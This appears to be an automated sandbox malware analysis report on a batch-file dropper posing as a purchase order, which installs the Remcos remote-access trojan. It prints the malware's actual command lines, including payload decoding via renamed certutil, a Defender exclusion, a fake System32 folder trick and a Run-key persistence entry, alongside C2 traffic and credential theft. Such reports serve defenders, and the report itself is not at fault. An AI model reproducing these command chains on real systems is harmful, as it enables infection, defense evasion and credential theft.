Malware Analysis Report

2024-12-07 22:23

Sample ID 240409-rxz8nach8t
Target PO3488-0337.bat
SHA256 985dda76570c9efdd692eca4a7bef55c99cbcac5ae7683360c115ea5529ebaa5
Tags
modiloader trojan remcos remotehost collection persistence rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

985dda76570c9efdd692eca4a7bef55c99cbcac5ae7683360c115ea5529ebaa5

Threat Level: Known bad

The file PO3488-0337.bat was found to be: Known bad.

Malicious Activity Summary

modiloader trojan remcos remotehost collection persistence rat spyware stealer

ModiLoader, DBatLoader

Remcos

ModiLoader Second Stage

Nirsoft

NirSoft WebBrowserPassView

NirSoft MailPassView

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Adds Run key to start application

Accesses Microsoft Outlook accounts

Suspicious use of SetThreadContext

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of FindShellTrayWindow

Script User-Agent

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-09 14:35

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-09 14:35

Reported

2024-04-09 14:37

Platform

win7-20240221-en

Max time kernel

132s

Max time network

134s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\PO3488-0337.bat"

Signatures

ModiLoader, DBatLoader

trojan modiloader

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Public\alpha.exe N/A
N/A N/A C:\Users\Public\alpha.exe N/A
N/A N/A C:\Users\Public\kn.exe N/A
N/A N/A C:\Users\Public\alpha.exe N/A
N/A N/A C:\Users\Public\kn.exe N/A
N/A N/A C:\Users\Public\Libraries\Yano.com N/A
N/A N/A C:\Users\Public\alpha.exe N/A
N/A N/A C:\Users\Public\alpha.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Public\Libraries\Yano.com

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Public\Libraries\Yano.com N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2036 wrote to memory of 2160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\extrac32.exe
PID 2036 wrote to memory of 2160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\extrac32.exe
PID 2036 wrote to memory of 2160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\extrac32.exe
PID 2036 wrote to memory of 2844 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2036 wrote to memory of 2844 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2036 wrote to memory of 2844 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2844 wrote to memory of 2120 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2844 wrote to memory of 2120 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2844 wrote to memory of 2120 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 2036 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2036 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2036 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2928 wrote to memory of 2580 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2928 wrote to memory of 2580 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2928 wrote to memory of 2580 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2036 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2036 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2036 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2628 wrote to memory of 2512 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2628 wrote to memory of 2512 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2628 wrote to memory of 2512 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 2036 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Yano.com
PID 2036 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Yano.com
PID 2036 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Yano.com
PID 2036 wrote to memory of 2116 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Yano.com
PID 2036 wrote to memory of 2472 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2036 wrote to memory of 2472 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2036 wrote to memory of 2472 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2036 wrote to memory of 2408 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2036 wrote to memory of 2408 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2036 wrote to memory of 2408 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2116 wrote to memory of 2784 N/A C:\Users\Public\Libraries\Yano.com C:\Windows\SysWOW64\WerFault.exe
PID 2116 wrote to memory of 2784 N/A C:\Users\Public\Libraries\Yano.com C:\Windows\SysWOW64\WerFault.exe
PID 2116 wrote to memory of 2784 N/A C:\Users\Public\Libraries\Yano.com C:\Windows\SysWOW64\WerFault.exe
PID 2116 wrote to memory of 2784 N/A C:\Users\Public\Libraries\Yano.com C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\PO3488-0337.bat"

C:\Windows\System32\extrac32.exe

C:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PO3488-0337.bat" "C:\\Users\\Public\\Yano.txt" 9

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PO3488-0337.bat" "C:\\Users\\Public\\Yano.txt" 9

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Yano.txt" "C:\\Users\\Public\\Libraries\\Yano.com" 12

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Yano.txt" "C:\\Users\\Public\\Libraries\\Yano.com" 12

C:\Users\Public\Libraries\Yano.com

C:\Users\Public\Libraries\Yano.com

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Yano.txt" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 724

Network

Country Destination Domain Proto
US 8.8.8.8:53 onedrive.live.com udp
US 13.107.137.11:443 onedrive.live.com tcp
US 13.107.137.11:443 onedrive.live.com tcp

Files

\Users\Public\alpha.exe

MD5 5746bd7e255dd6a8afa06f7c42c1ba41
SHA1 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256 db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA512 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

\Users\Public\kn.exe

MD5 ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1 ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA256 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA512 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

C:\Users\Public\Yano.txt

MD5 870803b239f8eafe8c904002d071242a
SHA1 3636a93964cf42a9d9adbeb8fc91e73ddc9bea1f
SHA256 f7cdbc8097cfc5ad70a9d5337b4bf699b9980b64d73d17cdd419ca8bb560f8ac
SHA512 c065f4536ef7a932c6868689bd352a5cc6ed85f12ee5af540a7cfb537ae27d3e989c4a5d2a88521e66eb0efc385d8c24dde44befb91c224a4d259ca2ef888e6d

C:\Users\Public\Libraries\Yano.com

MD5 a77fc511951e177b19df5e7604d39006
SHA1 cfa9a6bf1f4cd3f652575c56821702e75e9ac0b4
SHA256 9537982a9501f4dd4474d080c147a5afa3f125f6617811486c6341cdba1aa2da
SHA512 1af66d8c0996fb61f8842b7a9616e1c84a646f2eefc776dcf4a36df0752efbd777bf7f35b4143c94991e6fed6f074a6f93be189a3506e4811c830ab40e450b39

memory/2116-30-0x00000000003A0000-0x00000000003A1000-memory.dmp

memory/2116-33-0x0000000002E30000-0x0000000003E30000-memory.dmp

memory/2116-34-0x0000000002E30000-0x0000000003E30000-memory.dmp

memory/2116-36-0x00000000003A0000-0x00000000003A1000-memory.dmp

memory/2116-37-0x0000000000400000-0x0000000000573000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-09 14:35

Reported

2024-04-09 14:37

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

155s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PO3488-0337.bat"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Remcos

rat remcos

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows \System32\easinvoker.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Public\Libraries\Yano.com N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Lyjjreuv = "C:\\Users\\Public\\Lyjjreuv.url" C:\Users\Public\Libraries\Yano.com N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4600 set thread context of 4432 N/A C:\Users\Public\Libraries\Yano.com C:\Users\Public\Libraries\Yano.com
PID 4600 set thread context of 464 N/A C:\Users\Public\Libraries\Yano.com C:\Users\Public\Libraries\Yano.com
PID 4600 set thread context of 1148 N/A C:\Users\Public\Libraries\Yano.com C:\Users\Public\Libraries\Yano.com

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Public\Libraries\Yano.com N/A
N/A N/A C:\Users\Public\Libraries\Yano.com N/A
N/A N/A C:\Users\Public\Libraries\Yano.com N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\Libraries\Yano.com N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Public\Libraries\Yano.com N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Public\Libraries\Yano.com N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Public\Libraries\Yano.com N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1428 wrote to memory of 712 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\extrac32.exe
PID 1428 wrote to memory of 712 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\extrac32.exe
PID 1428 wrote to memory of 1384 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1428 wrote to memory of 1384 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1384 wrote to memory of 3340 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 1384 wrote to memory of 3340 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 1428 wrote to memory of 1052 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1428 wrote to memory of 1052 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1052 wrote to memory of 4508 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 1052 wrote to memory of 4508 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 1428 wrote to memory of 1264 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1428 wrote to memory of 1264 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1264 wrote to memory of 2168 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 1264 wrote to memory of 2168 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 1428 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Yano.com
PID 1428 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Yano.com
PID 1428 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\Yano.com
PID 1428 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1428 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1428 wrote to memory of 3372 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1428 wrote to memory of 3372 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4600 wrote to memory of 2128 N/A C:\Users\Public\Libraries\Yano.com C:\Windows\SysWOW64\cmd.exe
PID 4600 wrote to memory of 2128 N/A C:\Users\Public\Libraries\Yano.com C:\Windows\SysWOW64\cmd.exe
PID 4600 wrote to memory of 2128 N/A C:\Users\Public\Libraries\Yano.com C:\Windows\SysWOW64\cmd.exe
PID 2128 wrote to memory of 60 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2128 wrote to memory of 60 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2128 wrote to memory of 60 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2128 wrote to memory of 3412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2128 wrote to memory of 3412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2128 wrote to memory of 3412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2128 wrote to memory of 3368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2128 wrote to memory of 3368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2128 wrote to memory of 3368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2128 wrote to memory of 2488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2128 wrote to memory of 2488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2128 wrote to memory of 2488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2128 wrote to memory of 1356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2128 wrote to memory of 1356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2128 wrote to memory of 1356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2128 wrote to memory of 676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2128 wrote to memory of 676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2128 wrote to memory of 676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2128 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows \System32\easinvoker.exe
PID 2128 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows \System32\easinvoker.exe
PID 1612 wrote to memory of 1768 N/A C:\Windows \System32\easinvoker.exe C:\Windows\system32\cmd.exe
PID 1612 wrote to memory of 1768 N/A C:\Windows \System32\easinvoker.exe C:\Windows\system32\cmd.exe
PID 1768 wrote to memory of 2912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1768 wrote to memory of 2912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 1688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 1688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4600 wrote to memory of 2996 N/A C:\Users\Public\Libraries\Yano.com C:\Windows\SysWOW64\extrac32.exe
PID 4600 wrote to memory of 2996 N/A C:\Users\Public\Libraries\Yano.com C:\Windows\SysWOW64\extrac32.exe
PID 4600 wrote to memory of 2996 N/A C:\Users\Public\Libraries\Yano.com C:\Windows\SysWOW64\extrac32.exe
PID 4600 wrote to memory of 4432 N/A C:\Users\Public\Libraries\Yano.com C:\Users\Public\Libraries\Yano.com
PID 4600 wrote to memory of 4432 N/A C:\Users\Public\Libraries\Yano.com C:\Users\Public\Libraries\Yano.com
PID 4600 wrote to memory of 4432 N/A C:\Users\Public\Libraries\Yano.com C:\Users\Public\Libraries\Yano.com
PID 4600 wrote to memory of 464 N/A C:\Users\Public\Libraries\Yano.com C:\Users\Public\Libraries\Yano.com
PID 4600 wrote to memory of 464 N/A C:\Users\Public\Libraries\Yano.com C:\Users\Public\Libraries\Yano.com
PID 4600 wrote to memory of 464 N/A C:\Users\Public\Libraries\Yano.com C:\Users\Public\Libraries\Yano.com
PID 4600 wrote to memory of 1148 N/A C:\Users\Public\Libraries\Yano.com C:\Users\Public\Libraries\Yano.com
PID 4600 wrote to memory of 1148 N/A C:\Users\Public\Libraries\Yano.com C:\Users\Public\Libraries\Yano.com
PID 4600 wrote to memory of 1148 N/A C:\Users\Public\Libraries\Yano.com C:\Users\Public\Libraries\Yano.com

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PO3488-0337.bat"

C:\Windows\System32\extrac32.exe

C:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PO3488-0337.bat" "C:\\Users\\Public\\Yano.txt" 9

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PO3488-0337.bat" "C:\\Users\\Public\\Yano.txt" 9

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Yano.txt" "C:\\Users\\Public\\Libraries\\Yano.com" 12

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Yano.txt" "C:\\Users\\Public\\Libraries\\Yano.com" 12

C:\Users\Public\Libraries\Yano.com

C:\Users\Public\Libraries\Yano.com

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Yano.txt" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\LyjjreuvO.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO F"

C:\Windows\SysWOW64\xcopy.exe

xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO F"

C:\Windows\SysWOW64\xcopy.exe

xcopy "Aaa.bat" "C:\Windows \System32\" /K /D /H /Y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO F"

C:\Windows\SysWOW64\xcopy.exe

xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y

C:\Windows \System32\easinvoker.exe

"C:\Windows \System32\easinvoker.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\windows \system32\aaa.bat""

C:\Windows\system32\cmd.exe

cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"

C:\Windows\SysWOW64\extrac32.exe

C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Yano.com C:\\Users\\Public\\Libraries\\Lyjjreuv.PIF

C:\Users\Public\Libraries\Yano.com

C:\Users\Public\Libraries\Yano.com /stext "C:\Users\Admin\AppData\Local\Temp\ktpkhvfthsyqlgpjvgyjt"

C:\Users\Public\Libraries\Yano.com

C:\Users\Public\Libraries\Yano.com /stext "C:\Users\Admin\AppData\Local\Temp\nndcioqndarvnudvmrlcwcml"

C:\Users\Public\Libraries\Yano.com

C:\Users\Public\Libraries\Yano.com /stext "C:\Users\Admin\AppData\Local\Temp\xhivjybprijaybzzwbyehphuytnf"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3812 --field-trial-handle=2272,i,11831746627654527593,10138103687018060346,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 146.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 onedrive.live.com udp
US 13.107.137.11:443 onedrive.live.com tcp
US 13.107.137.11:443 onedrive.live.com tcp
US 8.8.8.8:53 11.137.107.13.in-addr.arpa udp
US 8.8.8.8:53 3zeubw.dm.files.1drv.com udp
US 13.107.42.12:443 3zeubw.dm.files.1drv.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 12.42.107.13.in-addr.arpa udp
US 192.3.216.142:7232 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 142.216.3.192.in-addr.arpa udp
US 8.8.8.8:53 geoplugin.net udp
US 192.3.216.142:7232 tcp
NL 178.237.33.50:80 geoplugin.net tcp
US 192.3.216.142:7232 tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 13.107.246.64:443 tcp
GB 142.250.200.10:443 tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 17.143.109.104.in-addr.arpa udp
US 8.8.8.8:53 216.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Public\alpha.exe

MD5 8a2122e8162dbef04694b9c3e0b6cdee
SHA1 f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256 b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA512 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

C:\Users\Public\kn.exe

MD5 bd8d9943a9b1def98eb83e0fa48796c2
SHA1 70e89852f023ab7cde0173eda1208dbb580f1e4f
SHA256 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA512 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

C:\Users\Public\Yano.txt

MD5 870803b239f8eafe8c904002d071242a
SHA1 3636a93964cf42a9d9adbeb8fc91e73ddc9bea1f
SHA256 f7cdbc8097cfc5ad70a9d5337b4bf699b9980b64d73d17cdd419ca8bb560f8ac
SHA512 c065f4536ef7a932c6868689bd352a5cc6ed85f12ee5af540a7cfb537ae27d3e989c4a5d2a88521e66eb0efc385d8c24dde44befb91c224a4d259ca2ef888e6d

C:\Users\Public\Libraries\Yano.com

MD5 a77fc511951e177b19df5e7604d39006
SHA1 cfa9a6bf1f4cd3f652575c56821702e75e9ac0b4
SHA256 9537982a9501f4dd4474d080c147a5afa3f125f6617811486c6341cdba1aa2da
SHA512 1af66d8c0996fb61f8842b7a9616e1c84a646f2eefc776dcf4a36df0752efbd777bf7f35b4143c94991e6fed6f074a6f93be189a3506e4811c830ab40e450b39

memory/4600-28-0x0000000000A30000-0x0000000000A31000-memory.dmp

memory/4600-29-0x0000000003E50000-0x0000000004E50000-memory.dmp

memory/4600-30-0x0000000003E50000-0x0000000004E50000-memory.dmp

memory/4600-32-0x0000000000400000-0x0000000000573000-memory.dmp

C:\Users\Public\Libraries\LyjjreuvO.bat

MD5 828ffbf60677999579dafe4bf3919c63
SHA1 a0d159a1b9a49e9eaccc53fe0c3266c0526a1bdc
SHA256 abac4a967800f5da708572ec42441ec373cd52459a83a8a382d6b8579482789d
SHA512 bf00909e24c5a6fb2346e8457a9adacd5f1b35988d90abbde9ff26896bbb59edafea60d9db4d10182a7b5e129bb69585d3e20bc5c63af3517b3a7ef1e45ffb7e

C:\Users\Public\Libraries\easinvoker.exe

MD5 231ce1e1d7d98b44371ffff407d68b59
SHA1 25510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA256 30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512 520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

C:\Users\Public\Libraries\aaa.bat

MD5 f4e8f0ec6cfc5c6039402322685cb6ce
SHA1 1037835573c2886dda05d256f15306da89dc645e
SHA256 cd05094e213643d624996b98e14aa5f7a2363f63530fe0c99523f6948effe756
SHA512 c5f9dfbbdb437c8ef9e2dd53fcbafcb256ab4626b4637a21332b3112c20f0d5353674031aae21b57604ba80d3b3f51f11b0ed412ed5fa6641b32fc4793746e02
